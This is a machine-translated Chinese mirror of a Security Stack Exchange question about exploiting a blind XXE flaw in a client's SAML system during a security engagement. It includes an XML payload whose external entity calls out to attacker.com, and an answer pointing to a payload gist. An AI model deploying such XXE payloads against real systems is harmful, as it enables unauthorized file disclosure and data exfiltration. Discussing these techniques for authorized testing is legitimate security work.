首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >XXE的攻击路径选择

XXE的攻击路径选择
EN

Security用户
提问于 2018-06-07 00:38:42
回答 1查看 795关注 0票数 1

因此,我在客户端接触时发现了对SAML基础设施的盲目Xml外部实体(XXE)攻击,但它让我更早地尝试利用它。我可以构造一个简单的XXE:

代码语言:javascript
复制
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/">%xxe;
]>
<xml></xml>

我从他们的服务器获得http连接,但是任何更复杂的东西,比如从我那里获取一个DTD并运行它,都得不到任何好处。我可以看到DTD的提取,但是DTD请求(对我的服务器的简单调用)没有执行。所以,在我的头撞墙三天后,我想我应该问问社区,当攻击受到限制时,他们是否对XXE有任何聪明的窍门或任何攻击路径。

EN

回答 1

Security用户

回答已采纳

发布于 2018-06-07 01:52:30

就像这个领域里的任何事情一样,更多的研究永远不会伤害到你!

我尝试了一个在这里找到的有效负载( https://gist.github.com/staaldraad/01415b990939494879b4 ),它最初不起作用,但后来我意识到实现需要的是实际有效的xml标记,在示例的末尾没有!

票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/187241

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档